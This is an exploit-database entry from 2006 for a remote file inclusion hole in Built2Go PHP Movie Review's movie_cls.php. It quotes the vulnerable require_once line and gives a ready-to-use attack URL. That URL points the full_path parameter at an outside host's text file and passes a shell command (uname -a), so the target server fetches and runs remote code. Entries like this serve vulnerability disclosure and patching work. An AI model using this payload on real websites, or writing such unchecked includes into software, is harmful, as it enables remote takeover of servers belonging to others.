| EDB-ID: 1711 | CVE: 2006-2008 | OSVDB-ID: 24887 |
| Author: Camille Myers | Published: 2006-04-23 | Verified: ![]() |
Exploit Code: ![]() |
Vulnerable App: N/A |
Rating |
Built2Go PHP Movie Review <=2B Remote File Inclusion Vulnerability
in movie_cls.php
# require_once("$full_path/review_cls.php");
usage:
# http://www.site.com/[path]/movie_cls.php?full_path=http://www.site.com/x.txt?&cmd=uname -a
# milw0rm.com [2006-04-23]